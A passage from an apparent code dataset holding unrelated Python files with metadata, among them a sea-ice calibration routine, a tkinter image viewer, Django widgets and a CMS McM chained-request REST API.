Y_beta = Y[np.logical_and(Y!=0.0,Y!=1.0)] \n\n # calibrate forecast SIC values \n # between zero and one using quantile mapping\n if a_x!=np.inf and a_y!=np.inf and a_x_t!=np.inf:\n rv_x_beta = beta(a_x, b_x, loc=0.0, scale=1.0 - 0.0)\n rv_y_beta = beta(a_y, b_y, loc=0.0, scale=1.0 - 0.0)\n # if none of cases 2-4 were encountered\n # for the raw forecast values\n X_t_cal_beta = rv_y_beta.ppf(rv_x_beta.cdf(X_t_beta)) \n else:\n #revert to empirical-based quantile mapping\n X_t_cal_beta = np.percentile(Y_beta,beinf.ecdf(X_t_beta,X_beta)*100.,interpolation='linear')\n \n # the quantile mapped values in the X_t_cal_beta array should never be zero or one,\n # but due to rounding in python this sometimes occurs. In these cases\n # change those values to epsilon or 1-epsilon. (epsilon=1e-12)\n X_t_cal_beta[X_t_cal_beta==0.0] = 1e-12 \n X_t_cal_beta[X_t_cal_beta==1.0] = 1.0 - 1e-12 \n\n cases = beinf.check_cases(X_t_cal_beta)\n #Solving of Eq. 8 (quantile mapping)\n if cases==False: \n a_x_t_cal, b_x_t_cal = beinf.fit_beta(X_t_cal_beta) \n X_t_cal_beta = np.inf*np.ones(len(X_t))\n else:\n a_x_t_cal, b_x_t_cal = np.inf, np.inf\n \n if len(X_t)!=len(X_t_cal_beta):\n X_t_cal_beta = np.append(X_t_cal_beta,np.inf*np.ones(len(X_t)-len(X_t_cal_beta)))\n\n x_t_cal_params = np.array([a_x_t_cal, b_x_t_cal, p_x_t_cal, q_x_t_cal])\n #Return BEINF distribution parameters \n return x_t_cal_params, X_t_cal_beta\n\n def unpack_params(self,array):\n '''\n Unpacks the individual parameters a, b, p, q from array.\n \n Args:\n array (ndarray):\n Array containing the four parameters a,b,p,q for\n a BEINF distribution.\n \n Returns: a,b,p,q (floats):\n The individual parameters for the BEINF disribution.\n '''\n a,b,p,q = map(lambda i: array[i], range(len(array)))\n return a,b,p,q\n","sub_path":"code/taqm.py","file_name":"taqm.py","file_ext":"py","file_size_in_byte":17892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"434819187","text":"from collections import defaultdict\nN = int(input())\ncnt = defaultdict(int)\n\nfor _ in range(N):\n cnt[input()] += 1\n\nmx = max(cnt.values())\ncnt = [s for s, n in cnt.items() if n == mx]\ncnt.sort()\n\nprint(*cnt, sep='\\n')\n","sub_path":"AtCoder/abc/155c.py","file_name":"155c.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"262575013","text":"import tkinter as tk\nfrom tkinter import filedialog\n\nfrom PIL import Image, ImageTk\n\n# To prevent accept_image() from acting weird for multiple images\ni=0\nlabelv ={}\nphoto={}\nimage={}\nx={}\ny={}\n\n#Font tuple\nLARGE_FONT=(\"Roboto\",44)\n\n\n# base class to handle multiple pages\nclass SeaofBTCapp(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n container=tk.Frame(self)\n container.pack(side=\"top\",fill=\"both\",expand=True)\n container.grid_rowconfigure(0,weight=1)\n container.grid_columnconfigure(0,weight=1)\n self.frames={}\n for F in (StartPage,PageOne):\n frame=F(container,self)\n self.frames[F]=frame\n frame.grid(row=0,column=0,sticky=\"nsew\")\n self.show_frame(StartPage)\n def show_frame(self,cont):\n frame=self.frames[cont]\n frame.tkraise()\n\n# First page\nclass StartPage(tk.Frame):\n def __init__(self,parent,controller):\n tk.Frame.__init__(self,parent)\n\n label=tk.Label(self,text=\"Start Page\",font=LARGE_FONT)\n label.pack(padx=10,pady=10)\n button1=tk.Button(self,text=\"Visit page 1\",\n command=lambda : controller.show_frame(PageOne))\n button1.pack()\n# Second page\nclass PageOne(tk.Frame):\n def __init__(self,parent,controller):\n tk.Frame.__init__(self,parent)\n label=tk.Label(self,text=\"Page One\",font=LARGE_FONT)\n label.pack(padx=10,pady=10)\n\n\n button1 = tk.Button(self, text=\"Back to page one\",\n command=lambda: controller.show_frame(StartPage))\n button1.pack()\n button2 = tk.Button(self, text=\"Open Image\",\n command=self.image_accepter)\n button2.pack()\n def image_accepter(self):\n global photo,i,labelv,image,x,y\n i+=1\n # gets the image\n image[i]=Image.open(tk.filedialog.askopenfilename())\n # resizes the image\n image[i]=image[i].resize((150,150),Image.ANTIALIAS)\n # photo of ImageTk\n photo[i] = ImageTk.PhotoImage(image=image[i])\n\n print(photo)\n # automatically add the imageTk to the frame\n labelv[i] = tk.Label(image=photo[i])\n if i==1:\n labelv[i].place(x=0)\n else:\n labelv[i].place(x=(i+200))\n\n\n\napp=SeaofBTCapp()\napp.mainloop()\n\n\n\n","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"460614098","text":"import logging\nimport os\nimport subprocess\n\nsubprocess.check_call('pip install pymongo', shell=True)\n\nimport pymongo\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\n\ndef initiate_mongodb_replicaset():\n mongo = pymongo.MongoClient(\n os.environ['MONGO_ADDRESS'],\n int(os.environ['MONGO_PORT']),\n )\n\n log.info(\"Initiating replicaset\")\n\n mongo.admin.command(\"replSetInitiate\", {\n '_id': 'rs01',\n 'members': [{'_id': 0, 'host': 'localhost:27017'}],\n })\n\n log.info(\"Success!\")\n\n\ndef main():\n log.info(\"Starting RocketChat Caboose\")\n try:\n initiate_mongodb_replicaset()\n except pymongo.errors.OperationFailure as e:\n if 'already initialized' in e.details['errmsg']:\n log.info('Done: already initialized.')\n return\n raise\n\n log.info(\"Done.\")\n\n\nif __name__ == '__main__':\n logging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n )\n\n main()\n","sub_path":"templates/rocketchat-caboose.py","file_name":"rocketchat-caboose.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"179158034","text":"# -​*- coding:utf-8 -*​-\r\n\r\nimport matplotlib.mlab as mlab\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n# 身長の疑似データを生成\r\nsample = 1000\r\nmu, sigma = 170, 5\r\ndata = np.random.normal(mu, sigma, sample)\r\n\r\n# ヒストグラムの描画\r\nn, bins, patches = plt.hist(data, normed=1, alpha=0.75, align='mid')\r\ny = mlab.normpdf(bins, mu, sigma)\r\nl = plt.plot(bins, y, 'r-', linewidth=1)\r\n\r\nplt.title(r'$\\mathrm{Histgram\\ of\\ Height:}\\ \\mu=%d,\\ \\sigma=%d$' % (mu, sigma))\r\nplt.xlabel('Height')\r\nplt.ylabel('Probability')\r\nplt.grid(True)\r\n\r\n# plt.show()\r\n# plt.savefig('/var/www/html/histgram.png')\r\nplt.savefig(r'c:\\Users\\akimi\\PycharmProjects\\python-exercise\\histgram.png') # the order is important.\r\nplt.show()","sub_path":"test-matplotlib2.py","file_name":"test-matplotlib2.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"477836092","text":"import math\nfrom itertools import chain\nfrom django import forms\nfrom django.forms.util import flatatt\nfrom django.forms import widgets\nfrom django.utils.encoding import force_unicode, force_text\nfrom django.utils.html import conditional_escape, format_html\nfrom django.utils.safestring import mark_safe\nfrom suit_redactor.widgets import RedactorWidget\nimport pdb\n\n\nclass SelectConDescripcion(widgets.Select):\n\n def __init__(self, attrs=None, choices=(), texto=None, readonly=False):\n super(SelectConDescripcion, self).__init__(attrs)\n self.texto = texto\n self.readonly = readonly\n self.choices = list(choices)\n\n def render(self, name, value, attrs=None, choices=()):\n if value is None:\n value = ''\n output = []\n options = self.render_options(choices, [value])\n\n final_attrs = self.build_attrs(attrs, name=name)\n\n if self.readonly is True:\n for k, v in self.choices:\n if k is 1:\n output.append(\"\".format(v))\n\n output.append(format_html(\n '', flatatt(final_attrs)))\n else:\n output.append(format_html(\n '', flatatt(final_attrs)))\n\n if options:\n output.append(options)\n output.append('')\n\n output.append('' + self.texto + '')\n return mark_safe('\\n'.join(output))\n\n\nclass RedactorSpanishWidget(RedactorWidget):\n class Media:\n css = {\n 'all': ('suit-redactor/redactor/redactor.css',)\n }\n js = (\n 'suit-redactor/redactor/redactor.min.js',\n 'js/admin/es_ar.js',\n )\n\n\nclass ColumnCheckboxSelectMultiple(forms.CheckboxSelectMultiple):\n \"\"\"\n Widget that renders multiple-select checkboxes in columns.\n Constructor takes number of columns and css class to apply\n to the
    elements that make up the columns.\n \"\"\"\n def __init__(self, columns=2, css_class=None, **kwargs):\n super(self.__class__, self).__init__(**kwargs)\n self.columns = columns\n self.css_class = css_class\n\n def render(self, name, value, attrs=None, choices=()):\n if value is None:\n value = []\n has_id = attrs and 'id' in attrs\n final_attrs = self.build_attrs(attrs, name=name)\n choices_enum = list(enumerate(chain(self.choices, choices)))\n \"\"\"\n This is the part that splits the choices into columns.\n Slices vertically. Could be changed to slice horizontally, etc.\n \"\"\"\n column_sizes = columnize(len(choices_enum), self.columns)\n columns = []\n for column_size in column_sizes:\n columns.append(choices_enum[:column_size])\n choices_enum = choices_enum[column_size:]\n output = []\n for column in columns:\n if self.css_class:\n output.append(u'
      ' % self.css_class)\n else:\n output.append(u'
        ')\n # Normalize to strings\n str_values = set([force_unicode(v) for v in value])\n for i, (option_value, option_label) in column:\n \"\"\"\n If an ID attribute was given\n add a numeric index as a suffix,\n so that the checkboxes don't all have the same ID attribute.\n \"\"\"\n if has_id:\n final_attrs = dict(final_attrs, id='%s_%s' % (\n attrs['id'], i))\n label_for = u' for=\"%s\"' % final_attrs['id']\n else:\n label_for = ''\n\n cb = forms.CheckboxInput(\n final_attrs, check_test=lambda value: value in str_values)\n option_value = force_unicode(option_value)\n rendered_cb = cb.render(name, option_value)\n option_label = conditional_escape(force_unicode(option_label))\n output.append(u'
      • %s %s
      • ' % (\n label_for, rendered_cb, option_label))\n output.append(u'
      ')\n return mark_safe(u'\\n'.join(output))\n\n\ndef columnize(items, columns):\n \"\"\"\n Return a list containing numbers of elements per column if `items` items\n are to be divided into `columns` columns.\n\n >>> columnize(10, 1)\n [10]\n >>> columnize(10, 2)\n [5, 5]\n >>> columnize(10, 3)\n [4, 3, 3]\n >>> columnize(3, 4)\n [1, 1, 1, 0]\n \"\"\"\n elts_per_column = []\n for col in range(columns):\n col_size = int(math.ceil(float(items) / columns))\n elts_per_column.append(col_size)\n items -= col_size\n columns -= 1\n return elts_per_column\n","sub_path":"dev/cent11/academica/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":4817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"368441209","text":"'''Provided is a list of data about a store’s inventory where each item in the list represents the name of \nan item, how much is in stock, and how much it costs. Print out each item in the list with the same \nformatting, using the .format method (not string concatenation). For example, the first print statment \nshould read The store has 12 shoes, each for 29.99 USD.'''\n\ninventory = [\"shoes, 12, 29.99\", \"shirts, 20, 9.99\", \"sweatpants, 25, 15.00\", \"scarves, 13, 7.75\"]\n\nfor item in inventory:\n litem = item.split()\n product = litem[0]\n stock = litem[1]\n stockwc = stock[:len(stock)-1] #Stock without comma\n price = litem[2]\n product_resume = 'The store has {} {} each for {} USD.'.format(stockwc, product, price)\n print(product_resume)","sub_path":"Chapter_9/ex_9_19.py","file_name":"ex_9_19.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"496933900","text":"#BEGIN HEADER\n\n#IsDebugged False\n#IsLocked True\n\n#/###################################/\n# Script giving functions allowing\n# a quick get of Sys modules with an\n# automatic import of the called one\n# if it was not already\n#/###################################/\n\n#END HEADER\n\ndef getModuleNameWithName(_Name):\n\t'''\n\t\tGet the conversions _Name to ModuleName\n\t'''\n\t\"\"\"\n\t\t#Print the ModuleName of the Functor module\n\t\tprint(_.getModuleNameWithName(\"Functor\");\n\t\"\"\"\n\treturn _Name+'PyModule';\n\ndef importModuleWithName(_Name):\n\t'''\n\t\tBuild the Basic Module Installer Method\n\t'''\n\t\"\"\"\n\t\t#Print before import\n\t\tprint(\"Is DirsParserModule imported : \"+str(sys.modules.has_key(_.getModuleNameWithName(\"DirsParser\"))));\n\n\t\t#Import a Module\n\t\tprint(\"Import DirsParser Module with importModuleWithName\");\n\t\t_.importModuleWithName(\"DirsParser\");\n\n\t\t#Print after import\n\t\tprint(\"Is DirsParserModule imported : \"+str(sys.modules.has_key(_.getModuleNameWithName(\"DirsParser\"))));\n\t\"\"\"\n\t\n\t#Build the Total PathString\n\tFolderPathString=_.getFolderPathStringWithName(_Name);\n\t\n\t#Look for already imported Module\n\tif (FolderPathString in sys.path)==False:\n\t\t\n\t\tprint(FolderPathString,os.path.isdir(FolderPathString))\n\t\t\n\t\t#Record only if the Path exists\n\t\tif os.path.isdir(FolderPathString):\n\t\t\n\t\t\t#Record the Path in sys\n\t\t\tsys.path.append(FolderPathString);\n\t\t\t\n\t\t\t#Import the Module\n\t\t\tModuleName=_.getModuleNameWithName(_Name);\n\t\t\t\n\t\t\t#Get the ModuleFilePathString just for checking\n\t\t\tModuleFilePathString=FolderPathString+ModuleName+'.py'\n\t\t\t\n\t\t\t#Import if the file exists\n\t\t\tif os.path.isfile(ModuleFilePathString):\n\t\t\t\timportlib.import_module(ModuleName);\n\ndef getModuleWithName(_Name):\n\t'''\n\t\tGet a Sys Module With its Name\n\t'''\n\t\"\"\"\n\t\tprint(\"Functor Module is : \");\n\t\tprint(_.getModuleWithName(\"Functor\"));\n\t\"\"\"\n\t\n\t#Import the Module\n\timportModuleWithName(_Name);\n\t\n\t#Get the ModuleName\n\tModuleName=getModuleNameWithName(_Name);\n\t\n\t#Return the Module\n\tif sys.modules.has_key(ModuleName):\n\t\treturn sys.modules[ModuleName];\n\n","sub_path":"Modules/_drafts/Functor/Modules/Getter/Modules/drafts/Classer/Scripts/1_ModuleWithNameGetter/ModuleWithNameGetterScript.py","file_name":"ModuleWithNameGetterScript.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"191021414","text":"import getenv\nimport sourcing\nimport sys\nimport argparse\nfrom os.path import join, dirname\n\ndescription = \"\"\"\nDetermines the system it is running on, walk the specified diretories,\nsearching for .sh files whose path matches the caracteristics of the\nsystem, and output an eval-able text to set variables to describe the\nrunning environnement and source the files in the walked directories.\n\"\"\"\n\nparser = argparse.ArgumentParser(description=description)\nargument = parser.add_argument\n\nargument(\n \"-d\", \"--directory\", required=True, action=\"append\", help=\"\"\"\\\nThe directory(ies) to walk, in search of matching .sh files.\"\"\"\n)\nargument(\n \"-s\", \"--shell\", help=\"\"\"\\\nThe name of the shell which will eval the output. It is also used \\\nas the 'sc_shell' variable and to match shell files to be sourced.\"\"\"\n)\nargument(\n \"-u\", \"--user\", help=\"\"\"\\\nThe name of the user to be used to dermine which files should be sourced, and \\\nto set the `sc_user` variable.\"\"\"\n)\n\nargs = parser.parse_args()\n\nenv = getenv.Env()\ntry:\n getenv.getenv(\n env=env,\n user=args.user,\n sh=args.shell,\n )\n sys.stdout.write(env.setenv)\nexcept:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n import traceback\n traceback.print_exception(\n exc_type, exc_value, exc_traceback,\n limit=2,\n file=sys.stderr,\n )\n\nsourcing = sourcing.sourcing(\n env=env,\n directoryList=args.directory,\n)\nsys.stdout.write(sourcing)\n","sub_path":"sc/shconf.py","file_name":"shconf.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"171093415","text":"#!/usr/bin/env python\n\nimport flask\n\nfrom json import dumps, loads\nfrom couchdb_layer.mcm_database import database\nfrom RestAPIMethod import RESTResource\nfrom json_layer.chained_request import chained_request\nfrom json_layer.request import request\nfrom json_layer.mccm import mccm\nfrom tools.user_management import access_rights\nfrom flask_restful import reqparse\nfrom tools.locker import locker\nfrom ChainedRequestPrepId import ChainedRequestPrepId\n\n\nclass CreateChainedRequest(RESTResource):\n\n access_limit = access_rights.administrator\n\n def __init__(self):\n self.db_name = 'chained_requests'\n self.before_request()\n self.count_call()\n\n def put(self):\n \"\"\"\n Create a chained request from the provided json content\n \"\"\"\n return self.import_request(flask.request.data.strip())\n\n def import_request(self, data):\n db = database(self.db_name)\n json_input = loads(data)\n if 'pwg' not in json_input or 'member_of_campaign' not in json_input:\n self.logger.error('Now pwg or member of campaign attribute for new chained request')\n return {\"results\": False}\n\n if 'prepid' in json_input:\n req = chained_request(json_input)\n cr_id = req.get_attribute('prepid')\n else:\n cr_id = ChainedRequestPrepId().next_prepid(json_input['pwg'], json_input['member_of_campaign'])\n if not cr_id:\n return {\"results\": False}\n\n req = chained_request(db.get(cr_id))\n for key in json_input:\n if key not in ['prepid', '_id', '_rev', 'history']:\n req.set_attribute(key, json_input[key])\n if not req.get_attribute('prepid'):\n self.logger.error('prepid returned was None')\n raise ValueError('Prepid returned was None')\n\n if 'chain_type' in json_input:\n chain_type = json_input['chain_type']\n else:\n ccdb = database('chained_campaigns')\n chain_type = ccdb.get(json_input['member_of_campaign']).get('chain_type', 'TaskChain')\n\n req.set_attribute('chain_type', chain_type)\n self.logger.info('Created new chained_request %s' % cr_id)\n # update history with the submission details\n req.update_history({'action': 'created'})\n return self.save_request(db, req)\n\n def save_request(self, db, req):\n if not db.document_exists(req.get_attribute('_id')):\n if db.save(req.json()):\n self.logger.info('new chained_request successfully saved.')\n return {\"results\": True, \"prepid\": req.get_attribute('prepid')}\n else:\n self.logger.error('Could not save new chained_request to database')\n return {\"results\": False}\n else:\n if db.update(req.json()):\n self.logger.info('new chained_request successfully saved.')\n return {\"results\": True, \"prepid\": req.get_attribute('prepid')}\n else:\n self.logger.error('Could not save new chained_request to database')\n return {\"results\": False}\n\n\nclass UpdateChainedRequest(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.db_name = 'chained_requests'\n self.before_request()\n self.count_call()\n\n def put(self):\n \"\"\"\n Update a chained request from the provided json content\n \"\"\"\n return self.update_request(flask.request.data)\n\n def update_request(self, data):\n if '_rev' not in data:\n return {\"results\": False, 'message': 'There is no previous revision provided'}\n\n try:\n chained_req = chained_request(json_input=loads(data))\n except chained_request.IllegalAttributeName:\n return {\"results\": False}\n\n prepid = chained_req.get_attribute('prepid')\n if not prepid and not chained_req.get_attribute('_id'):\n raise ValueError('Prepid returned was None')\n\n db = database(self.db_name)\n previous_version = chained_request(json_input=db.get(prepid))\n self.logger.info('Updating chained_request %s', prepid)\n new_priority = chained_req.get_attribute('action_parameters')['block_number']\n chained_req.set_priority(new_priority)\n # update history\n difference = self.get_obj_diff(previous_version.json(),\n chained_req.json(),\n ('history', '_rev'))\n difference = ', '.join(difference)\n chained_req.update_history({'action': 'update', 'step': difference})\n return {\"results\": db.update(chained_req.json())}\n\n\nclass DeleteChainedRequest(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def delete(self, chained_request_id):\n \"\"\"\n Simply delete a chained requests\n \"\"\"\n return self.delete_request(chained_request_id)\n\n def delete_request(self, crid):\n\n crdb = database('chained_requests')\n rdb = database('requests')\n mcm_cr = chained_request(crdb.get(crid))\n if mcm_cr.get_attribute('action_parameters')['flag']:\n return {\"results\": False,\n \"message\": \"Chained request %s is not disabled\" % (crid)}\n # get all objects\n mcm_r_s = []\n chain = mcm_cr.get_attribute('chain')\n for rid in reversed(chain):\n i = chain.index(rid)\n mcm_r = request(rdb.get(rid))\n in_chains = mcm_r.get_attribute('member_of_chain')\n if crid in in_chains:\n in_chains.remove(crid)\n self.logger.debug(\"Removing %s from member_of_chain of %s\", crid, rid)\n mcm_r.set_attribute('member_of_chain', in_chains)\n\n if not in_chains:\n # Last chain that had that request\n approval = mcm_r.get_attribute('approval')\n status = mcm_r.get_attribute('status')\n if i == 0 and approval == 'submit':\n # Root request that is submitted or done, must be reset first\n return {\"results\": False,\n \"message\": \"Root request %s, in %s-%s will not be chained anymore\" % (rid, approval, status)}\n if i != 0:\n # Not root request can't exist without a chain\n return {\"results\": False,\n \"message\": \"Not-root request %s will not be chained anymore\" % (rid)}\n\n mcm_r.update_history({'action': 'leave', 'step': crid})\n mcm_r_s.append(mcm_r)\n # then save all changes\n for mcm_r in mcm_r_s:\n if not rdb.update(mcm_r.json()):\n return {\"results\": False, \"message\": \"Could not save request \" + mcm_r.get_attribute('prepid')}\n\n return {\"results\": crdb.delete(crid)}\n\n\nclass GetChainedRequest(RESTResource):\n def __init__(self):\n self.db_name = 'chained_requests'\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_id):\n \"\"\"\n Retrieve the content of a chained request id\n \"\"\"\n return self.get_request(chained_request_id)\n\n def get_request(self, data):\n db = database(self.db_name)\n if ',' in data:\n rlist = data.rsplit(',')\n res = []\n for rid in rlist:\n tmp_data = db.get(prepid=rid)\n if len(tmp_data) > 0:\n res.append(tmp_data)\n return {\"results\": res}\n else:\n return {\"results\": db.get(prepid=data)}\n\n\n# REST method that makes the chained request flow to the next\n# step of the chain\nclass FlowToNextStep(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def put(self):\n \"\"\"\n Allows to flow a chained request with the dataset and blocks provided in the json\n \"\"\"\n return self.flow2(loads(flask.request.data))\n\n def get(self, chained_request_id, action='', reserve_campaign=''):\n \"\"\"\n Allow to flow a chained request with internal information\n \"\"\"\n check_stats = True\n reserve = False\n if action != '':\n check_stats = (action != 'force')\n reserve = (action == 'reserve')\n if reserve_campaign != '':\n reserve = reserve_campaign\n\n return self.multiple_flow(chained_request_id, check_stats, reserve)\n\n def multiple_flow(self, rid, check_stats=True, reserve=False):\n if ',' in rid:\n chain_id_list = rid.rsplit(',')\n else:\n chain_id_list = [rid]\n res = []\n chains_requests_dict = {}\n for chain_id in chain_id_list:\n flow_results = self.flow(chain_id, check_stats=check_stats, reserve=reserve)\n if flow_results['results'] and 'generated_requests' in flow_results:\n chains_requests_dict[chain_id] = flow_results['generated_requests']\n flow_results.pop('generated_requests')\n res.append(flow_results)\n if len(chains_requests_dict):\n chain_id = chains_requests_dict.iterkeys().next()\n mccm_ticket = mccm.get_mccm_by_generated_chain(chain_id)\n if mccm_ticket is not None:\n mccm_ticket.update_mccm_generated_chains(chains_requests_dict)\n if len(res) == 1:\n return res[0]\n return res\n\n def flow2(self, data):\n db = database('chained_requests')\n chain_id = data['prepid']\n try:\n creq = chained_request(json_input=db.get(chain_id))\n except Exception as ex:\n self.logger.error('Could not initialize chained_request object. Reason: %s' % (ex))\n return {\"results\": str(ex)}\n\n self.logger.info('Attempting to flow to next step for chained_request %s' % (\n creq.get_attribute('_id')))\n\n # if the chained_request can flow, do it\n inputds = ''\n inblack = []\n inwhite = []\n if 'input_dataset' in data:\n inputds = data['input_dataset']\n if 'block_black_list' in data:\n inblack = data['block_black_list']\n if 'block_white_list' in data:\n inwhite = data['block_white_list']\n if 'force' in data:\n check_stats = data['force'] != 'force'\n if 'reserve' in data and data[\"reserve\"]:\n reserve = data[\"reserve\"]\n return creq.reserve(limit=reserve)\n return creq.flow_trial(inputds, inblack, inwhite, check_stats)\n\n def flow(self, chainid, check_stats=True, reserve=False):\n try:\n db = database('chained_requests')\n creq = chained_request(json_input=db.get(chainid))\n except Exception as ex:\n self.logger.error('Could not initialize chained_request object. Reason: %s' % (ex))\n return {\"results\": str(ex)}\n\n # TO-DO check if chained_request is in settings forceflow_list and remove it!\n # if the chained_request can flow, do it\n if reserve:\n self.logger.info('Attempting to reserve to next step for chained_request %s' % (\n creq.get_attribute('_id')))\n return creq.reserve( limit = reserve, save_requests=False)\n\n self.logger.info('Attempting to flow to next step for chained_request %s' % (\n creq.get_attribute('_id')))\n return creq.flow_trial(check_stats=check_stats)\n\n\nclass RewindToPreviousStep(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_ids):\n \"\"\"\n Rewind the provided coma separated chained requests of one step.\n \"\"\"\n res = []\n crids = chained_request_ids.split(\",\")\n for crid in crids:\n res.append(self.rewind_one(crid))\n\n if len(res) != 1:\n return res\n else:\n return res[0]\n\n def rewind_one(self, crid):\n crdb = database('chained_requests')\n if not crdb.document_exists(crid):\n return {'results': False,\n 'message': '%s does not exist' % (crid),\n 'prepid': crid}\n\n mcm_cr = chained_request(crdb.get(crid))\n current_step = mcm_cr.get_attribute('step')\n if current_step == 0:\n return {'results': False,\n 'message': '%s already at the root' % (crid),\n 'prepid': crid}\n\n rdb = database('requests')\n current_prepid = mcm_cr.get_attribute('chain')[current_step]\n # Check if all other requests at all other chains are already reset\n # Check if all other chains have same request as current step\n current_request = request(rdb.get(current_prepid))\n chain_prepids = current_request.get_attribute('member_of_chain')\n chained_reqs = [chained_request(crdb.get(cr)) for cr in chain_prepids]\n # Simple check first\n for chained_req in chained_reqs:\n if chained_req.get_attribute('prepid') == crid:\n continue\n\n chained_req_id = chained_req.get_attribute('prepid')\n chained_req_step = chained_req.get_attribute('step')\n chained_req_chain = chained_req.get_attribute('chain')\n if chained_req_chain.index(current_prepid) < chained_req_step:\n return {'results': False,\n 'message': 'Rewind %s first' % (chained_req_id),\n 'prepid': crid}\n\n # More demanding request check\n for chained_req in chained_reqs:\n chained_req_id = chained_req.get_attribute('prepid')\n chained_req_step = chained_req.get_attribute('step')\n chained_req_chain = chained_req.get_attribute('chain')\n # Only leave requests after the \"current\" request\n chained_req_chain = chained_req_chain[chained_req_chain.index(current_prepid) + 1:]\n for next_req_id in reversed(chained_req_chain):\n # what if that next one is not in the db\n if not rdb.document_exists(next_req_id):\n raise Exception('%s is part of %s but does not exist' % (next_req_id,\n chained_req_id))\n\n req = rdb.get(next_req_id)\n req_status = req['status']\n if req_status != 'new':\n message = '%s is after the %s and is not \"new\", but \"%s\"' % (next_req_id,\n current_prepid,\n req_status)\n self.logger.error(message)\n return {'results': False,\n 'message': message,\n 'prepid': crid}\n\n # Move step back in all chained requests\n for chained_req in chained_reqs:\n chained_req_id = chained_req.get_attribute('prepid')\n chained_req_step = chained_req.get_attribute('step')\n chained_req_chain = chained_req.get_attribute('chain')\n chained_req.set_attribute('step', chained_req_chain.index(current_prepid) - 1)\n chained_req.set_last_status()\n chained_req.set_attribute('status', 'processing')\n saved = crdb.update(chained_req.json())\n if not saved:\n return {\n \"results\": False,\n \"message\": \"could not save %s\" % (chained_req_id),\n \"prepid\": crid}\n\n current_request.reset()\n current_request.set_attribute('input_dataset', '')\n saved = rdb.update(current_request.json())\n if not saved:\n return {'results': False,\n 'message': 'could not save %s' % (current_prepid),\n 'prepid': crid}\n\n\n return {\"results\": True, \"prepid\": crid}\n\n\nclass RewindToRoot(RewindToPreviousStep):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_ids):\n \"\"\"\n Rewind the provided coma separated chained requests to the root request\n \"\"\"\n res = []\n crdb = database('chained_requests')\n crids = chained_request_ids.split(\",\")\n for crid in crids:\n ch_request = chained_request(crdb.get(crid))\n if not ch_request:\n res.append({\"results\": False, \"message\": \"does not exist\", \"prepid\": crid})\n continue\n\n step = ch_request.get_attribute('step')\n for i in range(0, step):\n res_one = self.rewind_one(crid)\n if not res_one['results']:\n res.append(res_one)\n break\n else:\n res.append({'results': True, 'prepid': crid})\n\n if len(res) != 1:\n return res\n else:\n return res[0]\n\n\nclass ApproveChainedRequest(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_id, step=-1):\n \"\"\"\n move the chained request approval to the next step\n \"\"\"\n return self.multiple_approve(chained_request_id, step)\n\n def multiple_approve(self, rid, val=-1):\n if ',' in rid:\n rlist = rid.rsplit(',')\n res = []\n for r in rlist:\n res.append(self.approve(r, val))\n return res\n else:\n return self.approve(rid, val)\n\n def approve(self, rid, val=-1):\n db = database('chained_requests')\n if not db.document_exists(rid):\n return {\"prepid\": rid, \"results\": 'Error: The given chained_request id does not exist.'}\n creq = chained_request(json_input=db.get(rid))\n try:\n creq.approve(val)\n except Exception as ex:\n return {\"prepid\": rid, \"results\": False, 'message': str(ex)}\n\n saved = db.update(creq.json())\n if saved:\n return {\"prepid\": rid, \"results\": True}\n else:\n return {\n \"prepid\": rid,\n \"results\": False,\n 'message': 'unable to save the updated chained request'}\n\n\nclass InspectChain(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_id):\n \"\"\"\n Inspect a chained request for next action\n \"\"\"\n return self.multiple_inspect(chained_request_id)\n\n def multiple_inspect(self, crid):\n crlist = crid.rsplit(',')\n res = []\n crdb = database('chained_requests')\n for cr in crlist:\n if crdb.document_exists(cr):\n mcm_cr = chained_request(crdb.get(cr))\n res.append(mcm_cr.inspect())\n else:\n res.append({\"prepid\": cr, \"results\": False, 'message': '%s does not exist' % cr})\n\n if len(res) > 1:\n return res\n else:\n return res[0]\n\n\nclass SearchableChainedRequest(RESTResource):\n\n access_limit = access_rights.user\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, action=''):\n \"\"\"\n Return a document containing several usable values that can be searched and the value can be find. /do will trigger reloading of that document from all requests\n \"\"\"\n rdb = database('chained_requests')\n if action == 'do':\n 